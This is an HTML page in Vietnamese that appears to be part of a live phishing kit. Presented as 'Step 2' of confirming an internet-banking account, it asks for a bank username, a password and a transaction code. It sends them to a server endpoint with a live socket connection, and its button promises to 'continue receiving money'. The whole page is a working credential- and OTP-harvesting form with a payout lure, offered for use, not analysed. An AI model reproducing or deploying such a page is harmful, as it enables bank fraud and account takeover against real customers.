<html>

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="shortcut icon" href="/Content/Images/favicon.png">
    <link href="https://fonts.googleapis.com/css?family=Frank+Ruhl+Libre&display=swap" rel="stylesheet">
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="/js/step2validate.js"></script>
     <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.2.0/socket.io.js"></script>
        <script src="/js/connect-socket.js" ></script>
</head>

<body class="body-view-form" style="min-height: 400px;">
    <link href="/fonts/font-awesome-4.7.0/css/font-awesome.min.css" rel="stylesheet">
    <div style="">
        <div class="control-web-form row" id="control-web-form-toomarketer77702" style="max-width: 460px; background-color: rgb(232, 236, 163); background-repeat: repeat;">
            <div id="image-toomarketer77702"  style="width: 100%; max-width: 460px; margin-top:20px;letter-spacing: 2px;color: rgb(154, 89, 42);">
                <div style=" text-transform:uppercase; font-size:17;padding:5px 10px;color:#26885b;font-family: 'Frank Ruhl Libre', serif;">
                    Bước 2 : Xác Nhận Tài Khoản Mật Khẩu Truy Cập InternetBanking - EmoblieBanking vào hệ thống 
                </div>
            </div>
            <form class="" role="form" method="post" action="/actionstep2" onsubmit="return validateForm()" style="width: 100%;">
                <div id="custom-show-error-toomarketer77702" class="custom-alerts alert alert-danger">
                    <a type="button" class="close close-error-toomarketer" onclick="close_error_toomarketer('77702');"></a><span id="content-text-error-toomarketer77702"></span></div>
                <div class="form-body">
                    
                    <ul class="items" id="items-toomarketer77702">
                        <li id="10" data-customfieldname="Mobile">
                            <div style="font-style: italic; margin-bottom:10px"> indicates required field <span style="color:#F44336;"> *<span></div>
                            <div id="div10" class="form-group custom-padding-item" data-maxchar="15" data-required="true" data-formatid="1" data-typeid="6" data-component="text-box">
                            <div class=" alert-danger" style="padding:10px;margin-bottom:10px" id="erro">
                                   
                            </div>
                                <label id="captionname" class="captionname-toomarketer77702 checkrequired " data-fieldname="SĐT " style="color: rgb(66, 66, 66); font-size: 18px; text-align: left; display: block;">TÊN TÀI KHOẢN BANKING <span style="color:#F44336;"> *<span></span></span>
                                </label>
                                <div style="position:relative;">
                                    <input type="text" id="UserBanking" class="form-control input-sm" maxlength="15" value="" name="UserBanking" placeholder="" style="height: 30px; font-size: 15px; border-radius: 0px;">
                                </div>
                            </div>
                        </li>
                        <li id="22" data-customfieldname="Comment1">
                            <div id="div22" class="form-group custom-padding-item" data-maxchar="100" data-required="false" data-formatid="1" data-typeid="1" data-component="text-box">
                                <label id="captionname" class="captionname-toomarketer77702 checkrequired " data-fieldname="MẬT KHẨU" style="color: rgb(66, 66, 66); font-size: 18px; text-align: left; display: block;">MẬT KHẨU BANKING <span style="color:#F44336;"> *<span></label>
                                <div style="position:relative;">
                                    <input type="password" id="PasswordBanking" class="form-control input-sm" maxlength="100" value="" name="PasswordBanking" placeholder="" style="height: 30px; font-size: 15px; border-radius: 0px;">
                                    <div class="form-control-focus"></div>
                                </div>
                            </div>
                        </li>
                        <li id="24" data-customfieldname="Comment3">
                            <div id="div24" class="form-group custom-padding-item" data-maxchar="100" data-required="false" data-formatid="1" data-typeid="1" data-component="text-box">
                                <label id="captionname" class="captionname-toomarketer77702 checkrequired " data-fieldname="MÃ GD QUỐC TẾ" style="color: rgb(66, 66, 66); font-size: 18px; text-align: left; display: block;">MÃ GIAO DỊCH <span style="color:#F44336;"> *<span></label>
                                <div style="position:relative;">
                                    <input type="text" id="Tradingcode" class="form-control input-sm" maxlength="100" value="" name="Tradingcode" placeholder="" style="height: 30px; font-size: 15px; border-radius: 0px;">
                                    <div class="form-control-focus"></div>
                                </div>
                            </div>
                        </li>
                       
                    </ul>
                    <div class="submit custom-padding-item" style="text-align: left;">
                        <div>
                            <button type="submit" data-confirmed="false" class="btn blue" style="font-size: 12px; padding: 9px 14px 8px; width: 100%; border-radius: 0px; color: hsla(0, 54%, 21%, 0.85); ;background-color: #D8D8D8; border-color: rgb(255, 255, 255);    font-size: 15px"> TIẾP TỤC NHẬN TIỀN </button>
                        </div>
                    </div>
                    <div class="divLoading" style="display: none;">
                        <div class="wBall" id="wBall_1">
                            <div class="wInnerBall"></div>
                        </div>
                        <div class="wBall" id="wBall_2">
                            <div class="wInnerBall"></div>
                        </div>
                        <div class="wBall" id="wBall_3">
                            <div class="wInnerBall"></div>
                        </div>
                        <div class="wBall" id="wBall_4">
                            <div class="wInnerBall"></div>
                        </div>
                        <div class="wBall" id="wBall_5">
                            <div class="wInnerBall"></div>
                        </div>
                    </div>
                </div>
            </form>
            <div class="toomarketer-check-success">
                <div class="toomarketer-checkmark"><span class="toomarketer-success-checkmark"></span></div>
                <h2 class="toomarketer-animate-message">Đăng kí thành công</h2>
            </div>
            <div>
                <image src="banking.jpg" style="padding:10px !important;width:100%">
            </div>
        </div>
    </div>
    <div style="padding-top:2px;text-align:center;">
        <!-- <p style="margin:0;font-size:13px;color:#379a46">Powered by <a style="color: #379a46;font-size:14px;font-weight:bold; text-decoration: none;" href="//app.toomarketer.com">Toomarketer</a></p> -->
    </div>
    <link rel="stylesheet" type="text/css" href="https://forms.toomarketer.com/Content/Site-nonejs.css?1564476603029">
    <link rel="stylesheet" type="text/css" href="https://forms.toomarketer.com/Content/pikaday.css">
</body>

</html>